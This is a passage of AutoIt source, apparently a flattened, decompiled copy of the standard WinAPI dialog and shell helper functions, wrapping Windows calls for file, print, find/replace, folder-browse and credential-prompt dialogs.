0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLSETKNOWNFOLDERPATH ($SGUID , $SFILEPATH , $IFLAGS = 0 , $HTOKEN = 0 ) LOCAL $TGUID = DLLSTRUCTCREATE ($TAGGUID ) LOCAL $ARET = DLLCALL ("ole32.dll" , "long" , "CLSIDFromString" , "wstr" , $SGUID , "struct*" , $TGUID ) IF @ERROR OR $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) $ARET = DLLCALL ("shell32.dll" , "long" , "SHSetKnownFolderPath" , "struct*" , $TGUID , "dword" , $IFLAGS , "handle" , $HTOKEN , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSETLOCALIZEDNAME ($SFILEPATH , $SMODULE , $IRESID ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHSetLocalizedName" , "wstr" , $SFILEPATH , "wstr" , $SMODULE , "int" , $IRESID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSETSETTINGS ($IFLAGS , $BSET ) LOCAL $IVAL1 = 0 , $IVAL2 = 0 LOCAL $AOPT [20 ] [2 ] = [[1 , 1 ] , [2 , 2 ] , [4 , 32768 ] , [8 , 32 ] , [16 , 8 ] , [32 , 128 ] , [64 , 512 ] , [128 , 1024 ] , [256 , 2048 ] , [1024 , 4096 ] , [2048 , 8192 ] , [4096 , 16384 ] , [8192 , 131072 ] , [32768 , 262144 ] , [65536 , 1048576 ] , [1 , 524288 ] , [2 , 2097152 ] , [8 , 8388608 ] , [16 , 16777216 ] , [32 , 33554432 ] ] IF $BSET THEN FOR $I = 0 TO 14 IF BITAND ($IFLAGS , $AOPT [$I ] [1 ] ) THEN $IVAL1 += $AOPT [$I ] [0 ] ENDIF NEXT FOR $I = 15 TO 19 IF BITAND ($IFLAGS , $AOPT [$I ] [1 ] ) THEN $IVAL2 += $AOPT [$I ] [0 ] ENDIF NEXT ENDIF LOCAL $TSHELLSTATE = DLLSTRUCTCREATE ("uint[8]" ) DLLSTRUCTSETDATA ($TSHELLSTATE , 1 , $IVAL1 , 1 ) DLLSTRUCTSETDATA ($TSHELLSTATE , 1 , $IVAL2 , 8 ) DLLCALL ("shell32.dll" , "none" , "SHGetSetSettings" , "struct*" , $TSHELLSTATE , "dword" , $IFLAGS , "bool" , 1 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLUPDATEIMAGE ($SICON , $IINDEX , $IIMAGE , $IFLAGS = 0 ) DLLCALL ("shell32.dll" , "none" , "SHUpdateImageW" , "wstr" , $SICON , "int" , $IINDEX , "uint" , $IFLAGS , "int" , $IIMAGE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants GLOBAL $__G_PFRBUFFER = 0 , $__G_IFRBUFFERSIZE = 16385 GLOBAL CONST $TAGDEVNAMES = "ushort DriverOffset;ushort DeviceOffset;ushort OutputOffset;ushort Default" GLOBAL CONST $TAGFINDREPLACE = "dword Size;hwnd hOwner;ptr hInstance;dword Flags;ptr FindWhat;ptr ReplaceWith;ushort FindWhatLen;ushort ReplaceWithLen;lparam lParam;ptr Hook;ptr TemplateName" GLOBAL CONST $TAGMSGBOXPARAMS = "uint Size;hwnd hOwner;ptr hInstance;int_ptr Text;int_ptr Caption;dword Style;int_ptr Icon;dword_ptr ContextHelpId;ptr MsgBoxCallback;dword LanguageId" GLOBAL CONST $TAGPAGESETUPDLG = "dword Size;hwnd hOwner;ptr hDevMode;ptr hDevNames;dword Flags;long PaperWidth;long PaperHeight;long MarginMinLeft;long MarginMinTop;long MarginMinRight;long MarginMinBottom;long MarginLeft;long MarginTop;long MarginRight;long MarginBottom;ptr hInstance;lparam lParam;ptr PageSetupHook;ptr PagePaintHook;ptr PageSetupTemplateName;ptr hPageSetupTemplate" GLOBAL CONST $TAGPRINTDLG = (@AUTOITX64 "" "align 2;" ) & "dword Size;hwnd hOwner;handle hDevMode;handle hDevNames;handle hDC;dword Flags;word FromPage;word ToPage;word MinPage;word MaxPage;word Copies;handle hInstance;lparam lParam;ptr PrintHook;ptr SetupHook;ptr PrintTemplateName;ptr SetupTemplateName;handle hPrintTemplate;handle hSetupTemplate" GLOBAL CONST $TAGPRINTDLGEX = "dword Size;hwnd hOwner;handle hDevMode;handle hDevNames;handle hDC;dword Flags;dword Flags2;dword ExclusionFlags;dword NumPageRanges;dword MaxPageRanges;ptr PageRanges;dword MinPage;dword MaxPage;dword Copies;handle hInstance;ptr PrintTemplateName;lparam lParam;dword NumPropertyPages;ptr hPropertyPages;dword StartPage;dword ResultAction" GLOBAL CONST $TAGPRINTPAGERANGE = "dword FromPage;dword ToPage" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_BROWSEFORFOLDERDLG ($SROOT = "" , $STEXT = "" , $IFLAGS = 0 , $PBROWSEPROC = 0 , $LPARAM = 0 , $HPARENT = 0 ) LOCAL CONST $TAGBROWSEINFO = "hwnd hwndOwner;ptr pidlRoot;ptr pszDisplayName; ptr lpszTitle;uint ulFlags;ptr lpfn;lparam lParam;int iImage" LOCAL $TBROWSEINFO = DLLSTRUCTCREATE ($TAGBROWSEINFO & ";wchar[" & (STRINGLEN ($STEXT ) + 1 ) & "];wchar[260]" ) LOCAL $PPIDL = 0 , $SRESULT = "" IF STRINGSTRIPWS ($SROOT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN LOCAL $SPATH = _WINAPI_PATHSEARCHANDQUALIFY ($SROOT , 1 ) IF @ERROR THEN $SPATH = $SROOT ENDIF $PPIDL = _WINAPI_SHELLILCREATEFROMPATH ($SPATH ) IF @ERROR THEN ENDIF ENDIF DLLSTRUCTSETDATA ($TBROWSEINFO , 1 , $HPARENT ) DLLSTRUCTSETDATA ($TBROWSEINFO , 2 , $PPIDL ) DLLSTRUCTSETDATA ($TBROWSEINFO , 3 , DLLSTRUCTGETPTR ($TBROWSEINFO , 10 ) ) DLLSTRUCTSETDATA ($TBROWSEINFO , 4 , DLLSTRUCTGETPTR ($TBROWSEINFO , 9 ) ) DLLSTRUCTSETDATA ($TBROWSEINFO , 5 , $IFLAGS ) DLLSTRUCTSETDATA ($TBROWSEINFO , 6 , $PBROWSEPROC ) DLLSTRUCTSETDATA ($TBROWSEINFO , 7 , $LPARAM ) DLLSTRUCTSETDATA ($TBROWSEINFO , 8 , 0 ) DLLSTRUCTSETDATA ($TBROWSEINFO , 9 , $STEXT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "ptr" , "SHBrowseForFolderW" , "struct*" , $TBROWSEINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) $SRESULT = _WINAPI_SHELLGETPATHFROMIDLIST ($ARET [0 ] ) _WINAPI_COTASKMEMFREE ($ARET [0 ] ) IF $PPIDL THEN _WINAPI_COTASKMEMFREE ($PPIDL ) ENDIF IF NOT $SRESULT THEN RETURN SETERROR (10 , 0 , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_COMMDLGEXTENDEDERROR () LOCAL CONST $CDERR_DIALOGFAILURE = 65535 LOCAL CONST $CDERR_FINDRESFAILURE = 6 LOCAL CONST $CDERR_INITIALIZATION = 2 LOCAL CONST $CDERR_LOADRESFAILURE = 7 LOCAL CONST $CDERR_LOADSTRFAILURE = 5 LOCAL CONST $CDERR_LOCKRESFAILURE = 8 LOCAL CONST $CDERR_MEMALLOCFAILURE = 9 LOCAL CONST $CDERR_MEMLOCKFAILURE = 10 LOCAL CONST $CDERR_NOHINSTANCE = 4 LOCAL CONST $CDERR_NOHOOK = 11 LOCAL CONST $CDERR_NOTEMPLATE = 3 LOCAL CONST $CDERR_REGISTERMSGFAIL = 12 LOCAL CONST $CDERR_STRUCTSIZE = 1 LOCAL CONST $FNERR_BUFFERTOOSMALL = 12291 LOCAL CONST $FNERR_INVALIDFILENAME = 12290 LOCAL CONST $FNERR_SUBCLASSFAILURE = 12289 LOCAL $ARESULT = DLLCALL ("comdlg32.dll" , "dword" , "CommDlgExtendedError" ) IF NOT @ERROR THEN SWITCH $ARESULT [0 ] CASE $CDERR_DIALOGFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The dialog box could not be created." & @LF & "The common dialog box function's call to the DialogBox function failed." & @LF & "For example, this error occurs if the common dialog box call specifies an invalid window handle." ) CASE $CDERR_FINDRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to find a specified resource." ) CASE $CDERR_INITIALIZATION RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed during initialization." & @LF & "This error often occurs when sufficient memory is not available." ) CASE $CDERR_LOADRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to load a specified resource." ) CASE $CDERR_LOADSTRFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to load a specified string." ) CASE $CDERR_LOCKRESFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function failed to lock a specified resource." ) CASE $CDERR_MEMALLOCFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function was unable to allocate memory for internal structures." ) CASE $CDERR_MEMLOCKFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "The common dialog box function was unable to lock the memory associated with a handle." ) CASE $CDERR_NOHINSTANCE RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding instance handle." ) CASE $CDERR_NOHOOK RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLEHOOK flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a pointer to a corresponding hook procedure." ) CASE $CDERR_NOTEMPLATE RETURN SETERROR ($ARESULT [0 ] , 0 , "The ENABLETEMPLATE flag was set in the Flags member of the initialization structure for the corresponding common dialog box," & @LF & "but you failed to provide a corresponding template." ) CASE $CDERR_REGISTERMSGFAIL RETURN SETERROR ($ARESULT [0 ] , 0 , "The RegisterWindowMessage function returned an error code when it was called by the common dialog box function." ) CASE $CDERR_STRUCTSIZE RETURN SETERROR ($ARESULT [0 ] , 0 , "The lStructSize member of the initialization structure for the corresponding common dialog box is invalid" ) CASE $FNERR_BUFFERTOOSMALL RETURN SETERROR ($ARESULT [0 ] , 0 , "The buffer pointed to by the lpstrFile member of the OPENFILENAME structure is too small for the file name specified by the user." & @LF & "The first two bytes of the lpstrFile buffer contain an integer value specifying the size, in TCHARs, required to receive the full name." ) CASE $FNERR_INVALIDFILENAME RETURN SETERROR ($ARESULT [0 ] , 0 , "A file name is invalid." ) CASE $FNERR_SUBCLASSFAILURE RETURN SETERROR ($ARESULT [0 ] , 0 , "An attempt to subclass a list box failed because sufficient memory was not available." ) ENDSWITCH ENDIF RETURN SETERROR (@ERROR , @EXTENDED , "0x" & HEX ($ARESULT [0 ] ) ) ENDFUNC FUNC _WINAPI_COMMDLGEXTENDEDERROREX () LOCAL $ARET = DLLCALL ("comdlg32.dll" , "dword" , "CommDlgExtendedError" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CONFIRMCREDENTIALS ($STARGET , $BCONFIRM ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIConfirmCredentialsW" , "wstr" , $STARGET , "bool" , $BCONFIRM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FINDTEXTDLG ($HOWNER , $SFINDWHAT = "" , $IFLAGS = 0 , $PFINDPROC = 0 , $LPARAM = 0 ) $__G_PFRBUFFER = __HEAPREALLOC ($__G_PFRBUFFER , 2 * $__G_IFRBUFFERSIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) DLLSTRUCTSETDATA (DLLSTRUCTCREATE ("wchar[" & $__G_IFRBUFFERSIZE & "]" , $__G_PFRBUFFER ) , 1 , STRINGLEFT ($SFINDWHAT , $__G_IFRBUFFERSIZE + 4294967295 ) ) LOCAL $TFR = DLLSTRUCTCREATE ($TAGFINDREPLACE ) DLLSTRUCTSETDATA ($TFR , "Size" , DLLSTRUCTGETSIZE ($TFR ) ) DLLSTRUCTSETDATA ($TFR , "hOwner" , $HOWNER ) DLLSTRUCTSETDATA ($TFR , "hInstance" , 0 ) DLLSTRUCTSETDATA ($TFR , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TFR , "FindWhat" , $__G_PFRBUFFER ) DLLSTRUCTSETDATA ($TFR , "ReplaceWith" , 0 ) DLLSTRUCTSETDATA ($TFR , "FindWhatLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "ReplaceWithLen" , 0 ) DLLSTRUCTSETDATA ($TFR , "lParam" , $LPARAM ) DLLSTRUCTSETDATA ($TFR , "Hook" , $PFINDPROC ) DLLSTRUCTSETDATA ($TFR , "TemplateName" , 0 ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "hwnd" , "FindTextW" , "struct*" , $TFR ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR + 30 __HEAPFREE ($__G_PFRBUFFER ) IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) ELSE RETURN SETERROR ($IERROR , @EXTENDED , 0 ) ENDIF ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_FLUSHFRBUFFER () IF NOT __HEAPFREE ($__G_PFRBUFFER , 1 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_FORMATDRIVEDLG ($SDRIVE , $IOPTION = 0 , $HPARENT = 0 ) IF NOT ISSTRING ($SDRIVE ) THEN RETURN SETERROR (10 , 0 , 0 ) $SDRIVE = STRINGLEFT (STRINGUPPER (STRINGSTRIPWS ($SDRIVE , $STR_STRIPLEADING ) ) , 1 ) IF NOT $SDRIVE THEN RETURN SETERROR (11 , 0 , 0 ) $SDRIVE = ASC ($SDRIVE ) + 4294967231 IF ($SDRIVE < 0 ) OR ($SDRIVE > 25 ) THEN RETURN SETERROR (12 , 0 , 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "dword" , "SHFormatDrive" , "hwnd" , $HPARENT , "uint" , $SDRIVE , "uint" , 65535 , "uint" , $IOPTION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] < 0 THEN RETURN SETERROR ($ARET [0 ] , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCONNECTEDDLG ($IDLG , $IFLAGS = 0 , $HPARENT = 0 ) IF NOT __DLL ("connect.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) SWITCH $IDLG CASE 0 $IDLG = "GetNetworkConnected" CASE 1 $IDLG = "GetInternetConnected" CASE 2 $IDLG = "GetVPNConnected" CASE ELSE RETURN SETERROR (1 , 0 , 0 ) ENDSWITCH LOCAL $SSTR = "" IF BITAND ($IFLAGS , 1 ) THEN $SSTR &= "-SkipInternetDetection " ENDIF IF BITAND ($IFLAGS , 2 ) THEN $SSTR &= "-SkipExistingConnections " ENDIF IF BITAND ($IFLAGS , 4 ) THEN $SSTR &= "-HideFinishPage " ENDIF LOCAL $ARET = DLLCALL ("connect.dll" , "long" , $IDLG , "hwnd" , $HPARENT , "dword" , 0 , "dword" , 0 , "dword" , 0 , "handle" , 0 , "wstr" , STRINGSTRIPWS ($SSTR , $STR_STRIPTRAILING ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT ($ARET [0 ] = 0 OR $ARET [0 ] = 1 ) THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN NUMBER (NOT $ARET [0 ] ) ENDFUNC FUNC _WINAPI_GETFRBUFFER () RETURN $__G_IFRBUFFERSIZE + 4294967295 ENDFUNC FUNC _WINAPI_GETOPENFILENAME ($STITLE = "" , $SFILTER = "All files (*.*)" , $SINITALDIR = "." , $SDEFAULTFILE = "" , $SDEFAULTEXT = "" , $IFILTERINDEX = 1 , $IFLAGS = 0 , $IFLAGSEX = 0 , $HWNDOWNER = 0 ) LOCAL $VRESULT = __OFNDLG (0 , $STITLE , $SINITALDIR , $SFILTER , $IFILTERINDEX , $SDEFAULTFILE , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , 0 , 0 , $HWNDOWNER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF BITAND ($IFLAGS , $OFN_ALLOWMULTISELECT ) THEN RETURN __WINAPI_PARSEMULTISELECTFILEDIALOGPATH ($VRESULT ) ELSE RETURN __WINAPI_PARSEFILEDIALOGPATH ($VRESULT ) ENDIF ENDFUNC FUNC _WINAPI_GETSAVEFILENAME ($STITLE = "" , $SFILTER = "All files (*.*)" , $SINITALDIR = "." , $SDEFAULTFILE = "" , $SDEFAULTEXT = "" , $IFILTERINDEX = 1 , $IFLAGS = 0 , $IFLAGSEX = 0 , $HWNDOWNER = 0 ) LOCAL $SRETURN = __OFNDLG (1 , $STITLE , $SINITALDIR , $SFILTER , $IFILTERINDEX , $SDEFAULTFILE , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , 0 , 0 , $HWNDOWNER ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN __WINAPI_PARSEFILEDIALOGPATH ($SRETURN ) ENDFUNC FUNC _WINAPI_MESSAGEBOXCHECK ($ITYPE , $STITLE , $STEXT , $SREGVAL , $IDEFAULT = + 4294967295 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "SHMessageBoxCheckW" , "hwnd" , $HPARENT , "wstr" , $STEXT , "wstr" , $STITLE , "uint" , $ITYPE , "int" , $IDEFAULT , "wstr" , $SREGVAL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_MESSAGEBOXINDIRECT ($TMSGBOXPARAMS ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "MessageBoxIndirectW" , "struct*" , $TMSGBOXPARAMS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_OPENFILEDLG ($STITLE = "" , $SINITDIR = "" , $SFILTERS = "" , $IDEFAULTFILTER = 0 , $SDEFAULTFILEPATH = "" , $SDEFAULTEXT = "" , $IFLAGS = 0 , $IFLAGSEX = 0 , $POFNPROC = 0 , $PDATA = 0 , $HPARENT = 0 ) LOCAL $SRESULT = __OFNDLG (0 , $STITLE , $SINITDIR , $SFILTERS , $IDEFAULTFILTER , $SDEFAULTFILEPATH , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_PAGESETUPDLG (BYREF $TPAGESETUPDLG ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "int" , "PageSetupDlgW" , "struct*" , $TPAGESETUPDLG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PICKICONDLG ($SICON = "" , $IINDEX = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "PickIconDlg" , "hwnd" , $HPARENT , "wstr" , $SICON , "int" , 4096 , "int*" , $IINDEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [2 ] LOCAL $ARES = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $ARET [2 ] , "wstr" , "" , "dword" , 4096 ) $ARESULT [0 ] = $ARES [2 ] $ARESULT [1 ] = $ARET [4 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_PRINTDLG (BYREF $TPRINTDLG ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "long" , "PrintDlgW" , "struct*" , $TPRINTDLG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PRINTDLGEX (BYREF $TPRINTDLGEX ) LOCAL $TPDEX = DLLSTRUCTCREATE ($TAGPRINTDLGEX , DLLSTRUCTGETPTR ($TPRINTDLGEX ) ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "long" , "PrintDlgExW" , "struct*" , $TPDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN SETEXTENDED (DLLSTRUCTGETDATA ($TPDEX , "ResultAction" ) , 1 ) ENDFUNC FUNC _WINAPI_REPLACETEXTDLG ($HOWNER , $SFINDWHAT = "" , $SREPLACEWITH = "" , $IFLAGS = 0 , $PREPLACEPROC = 0 , $LPARAM = 0 ) $__G_PFRBUFFER = __HEAPREALLOC ($__G_PFRBUFFER , 4 * $__G_IFRBUFFERSIZE ) IF @ERROR THEN RETURN SETERROR (@ERROR + 100 , @EXTENDED , 0 ) LOCAL $TBUFF = DLLSTRUCTCREATE ("wchar[" & $__G_IFRBUFFERSIZE & "];wchar[" & $__G_IFRBUFFERSIZE & "]" , $__G_PFRBUFFER ) DLLSTRUCTSETDATA ($TBUFF , 1 , STRINGLEFT ($SFINDWHAT , $__G_IFRBUFFERSIZE + 4294967295 ) ) DLLSTRUCTSETDATA ($TBUFF , 2 , STRINGLEFT ($SREPLACEWITH , $__G_IFRBUFFERSIZE + 4294967295 ) ) LOCAL $TFR = DLLSTRUCTCREATE ($TAGFINDREPLACE ) DLLSTRUCTSETDATA ($TFR , "Size" , DLLSTRUCTGETSIZE ($TFR ) ) DLLSTRUCTSETDATA ($TFR , "hOwner" , $HOWNER ) DLLSTRUCTSETDATA ($TFR , "hInstance" , 0 ) DLLSTRUCTSETDATA ($TFR , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TFR , "FindWhat" , DLLSTRUCTGETPTR ($TBUFF , 1 ) ) DLLSTRUCTSETDATA ($TFR , "ReplaceWith" , DLLSTRUCTGETPTR ($TBUFF , 2 ) ) DLLSTRUCTSETDATA ($TFR , "FindWhatLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "ReplaceWithLen" , $__G_IFRBUFFERSIZE * 2 ) DLLSTRUCTSETDATA ($TFR , "lParam" , $LPARAM ) DLLSTRUCTSETDATA ($TFR , "Hook" , $PREPLACEPROC ) DLLSTRUCTSETDATA ($TFR , "TemplateName" , 0 ) LOCAL $ARET = DLLCALL ("comdlg32.dll" , "hwnd" , "ReplaceTextW" , "struct*" , $TFR ) IF @ERROR OR NOT $ARET [0 ] THEN LOCAL $IERROR = @ERROR __HEAPFREE ($__G_PFRBUFFER ) IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , 0 ) ELSE RETURN SETERROR ($IERROR , 0 , 0 ) ENDIF ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_RESTARTDLG ($STEXT = "" , $IFLAGS = 2 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "RestartDialog" , "hwnd" , $HPARENT , "wstr" , $STEXT , "int" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SAVEFILEDLG ($STITLE = "" , $SINITDIR = "" , $SFILTERS = "" , $IDEFAULTFILTER = 0 , $SDEFAULTFILEPATH = "" , $SDEFAULTEXT = "" , $IFLAGS = 0 , $IFLAGSEX = 0 , $POFNPROC = 0 , $PDATA = 0 , $HPARENT = 0 ) LOCAL $SRESULT = __OFNDLG (1 , $STITLE , $SINITDIR , $SFILTERS , $IDEFAULTFILTER , $SDEFAULTFILEPATH , $SDEFAULTEXT , $IFLAGS , $IFLAGSEX , $POFNPROC , $PDATA , $HPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $SRESULT ENDFUNC FUNC _WINAPI_SETFRBUFFER ($ICHARS ) $ICHARS = NUMBER ($ICHARS ) IF $ICHARS < 80 THEN $ICHARS = 80 ENDIF $__G_IFRBUFFERSIZE = $ICHARS + 1 RETURN 1 ENDFUNC FUNC _WINAPI_SHELLABOUTDLG ($STITLE , $SNAME , $STEXT , $HICON = 0 , $HPARENT = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "ShellAboutW" , "hwnd" , $HPARENT , "wstr" , $STITLE & "#" & $SNAME , "wstr" , $STEXT , "handle" , $HICON ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SHELLOPENWITHDLG ($SFILEPATH , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $TOPENASINFO = DLLSTRUCTCREATE ("ptr;ptr;dword;wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TOPENASINFO , 1 , DLLSTRUCTGETPTR ($TOPENASINFO , 4 ) ) DLLSTRUCTSETDATA ($TOPENASINFO , 2 , 0 ) DLLSTRUCTSETDATA ($TOPENASINFO , 3 , $IFLAGS ) DLLSTRUCTSETDATA ($TOPENASINFO , 4 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "long" , "SHOpenWithDialog" , "hwnd" , $HPARENT , "struct*" , $TOPENASINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLSTARTNETCONNECTIONDLG ($SREMOTE = "" , $IFLAGS = 0 , $HPARENT = 0 ) LOCAL $STYPEOFREMOTE = "wstr" IF NOT STRINGSTRIPWS ($SREMOTE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFREMOTE = "ptr" $SREMOTE = 0 ENDIF DLLCALL ("shell32.dll" , "long" , "SHStartNetConnectionDialogW" , "hwnd" , $HPARENT , $STYPEOFREMOTE , $SREMOTE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_SHELLUSERAUTHENTICATIONDLG ($SCAPTION , $SMESSAGE , $SUSER , $SPASSWORD , $STARGET , $IFLAGS = 0 , $IERROR = 0 , $BSAVE = FALSE , $HBITMAP = 0 , $HPARENT = 0 ) IF NOT __DLL ("credui.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TINFO = DLLSTRUCTCREATE ("dword;hwnd;ptr;ptr;ptr;wchar[" & (STRINGLEN ($SMESSAGE ) + 1 ) & "];wchar[" & (STRINGLEN ($SCAPTION ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TINFO , 1 , DLLSTRUCTGETPTR ($TINFO , 6 ) - DLLSTRUCTGETPTR ($TINFO ) ) DLLSTRUCTSETDATA ($TINFO , 2 , $HPARENT ) DLLSTRUCTSETDATA ($TINFO , 3 , DLLSTRUCTGETPTR ($TINFO , 6 ) ) DLLSTRUCTSETDATA ($TINFO , 4 , DLLSTRUCTGETPTR ($TINFO , 7 ) ) DLLSTRUCTSETDATA ($TINFO , 5 , $HBITMAP ) DLLSTRUCTSETDATA ($TINFO , 6 , $SMESSAGE ) DLLSTRUCTSETDATA ($TINFO , 7 , $SCAPTION ) LOCAL $ARET = DLLCALL ("credui.dll" , "dword" , "CredUIPromptForCredentialsW" , "struct*" , $TINFO , "wstr" , $STARGET , "ptr" , 0 , "dword" , $IERROR , "wstr" , $SUSER , "ulong" , 4096 , "wstr" , $SPASSWORD , "ulong" , 4096 , "bool*" , $BSAVE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) LOCAL $ARESULT [3 ] $ARESULT [0 ] = $ARET [5 ] $ARESULT [1 ] = $ARET [7 ] $ARESULT [2 ] = $ARET [9 ] RETURN $ARESULT ENDFUNC FUNC _WINAPI_SHELLUSERAUTHENTICATIONDLGEX ($SCAPTION , $SMESSAGE , $SUSER , $SPASSWORD , $IFLAGS = 0 , 